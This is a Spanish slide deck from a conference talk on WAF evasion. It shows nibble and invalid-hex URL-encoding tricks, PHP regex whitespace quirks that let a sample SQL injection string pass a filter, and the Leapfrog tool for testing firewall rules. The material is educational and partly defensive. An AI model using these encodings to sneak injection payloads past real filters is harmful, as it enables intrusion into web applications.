  • 78. EVADIENDO FIREWALLS – Codificaciones URL Encode / Firewalls Debiles Demo
  • 79. EVADIENDO FIREWALLS – Codificaciones Nibble • Un nibble son 4 bits • Un nibble representa medio caracter hexadecimal (2^4 = 16) • Dos nibbles o un octet, representa un caracter hexadecimal
  • 80. EVADIENDO FIREWALLS – Codificaciones Nibble Hex Decimal Octal Binary 0 0 0 0000 1 1 1 0001 2 2 2 0010 3 3 3 0011 4 4 4 0100 5 5 5 0101 6 6 6 0110 7 7 7 0111 8 8 10 1000 9 9 11 1001 A 10 12 1010 B 11 13 1011 C 12 14 1100 D 13 15 1101 E 14 16 1110 F 15 17 1111
  • 81. EVADIENDO FIREWALLS – Codificaciones First Nibble • Los primeros 4 bits son URL encoded • “a” = %61 • 6 = %36 • %%361
  • 82. EVADIENDO FIREWALLS – Codificaciones Second Nibble • Los segundos 4 bits son URL encoded • “a” = %61 • 1 = %31 • %6%31
  • 83. EVADIENDO FIREWALLS – Codificaciones Double Nibble • Es una combinacion de “first nibble” + “second nibble” encoding • “a” = %61 • 6 = 36 • 1 = %31 • %%36%31
  • 84. EVADIENDO FIREWALLS – Codificaciones Hex Invalido • Se trata de crear hex invalido que resulta en el mismo valor decimal que hex valido • “a” = %61 • %61 = 6 * 16 + 1 = 97 • %2Ú = 2 * 16 + 65 = 97 • %2Ú es lo mismo que %61
  • 85. EVADIENDO FIREWALLS – Codificaciones Invalid Hex Decimal Hex Valido Hex Invalido 10 0A 0A 11 0B 0B 12 0C 0C 13 0D 0D 14 0E 0E 15 0F 0F 16 10 0G 17 11 0H
  • 87. RAREZAS DE PHP Espacios <?php if(preg_match("/^.+$/", $_GET["t"])) { Bloque peticion maliciosa... } ?> ?t=1 AND 1=1 BLOQUEADO ?t=1 AND 1=1%20 ?t=1 AND 1=1%A0 ?t=1 AND 1=1%0D,%0C,%0B ?t=1 AND 1=1%0A%20 BLOQUEADO BLOQUEADO BLOQUEADO PERMITIDO
  • 88. RAREZAS DE PHP Espacios <?php if(preg_match("/s+/", $_GET["t"])) { Bloque peticion maliciosa... } ?> • En algunas configuraciones el NBSP es detectado como un espacio, en otras configuraciones no lo es
  • 90. • Una herramienta diseñada para mejorar las reglas del Firewall • Busca bypases para diferentes ataques web (SQLi, XSS, LFI, Filtros de contenido) • Crea todo sus vectores dinámicamente • Proporciona recomendaciones al encontrar un bypass • Genera una calificación basada en la cantidad de vectores permitidos LEAPFROG Que es?
  • 91. • WAF Acceptance Factor es la calificación que genera basado en los vectores permitidos LEAPFROG WAF Acceptance Factor
  • 92. • Wife Acceptance Factor tomado de: http://en.wikipedia.org/wiki/Wife_acceptance_factor LEAPFROG Wife Acceptance Factor

Notas del editor

  1. Ok, no explicareestoahoraque me tomariatoda la conferenciaEstainyeccion de SQLisirve para confundir al adminLo puedecorrersi se atreveOfuscacionesuna de lasformas principals para evadir la deteccion de firewallsSi podemos esconder nuestro ataque y hacer que el firewall piense que es información valida, podemos evadir la detección del firewall y hacer que nuestro ataque pase sin ser bloqueado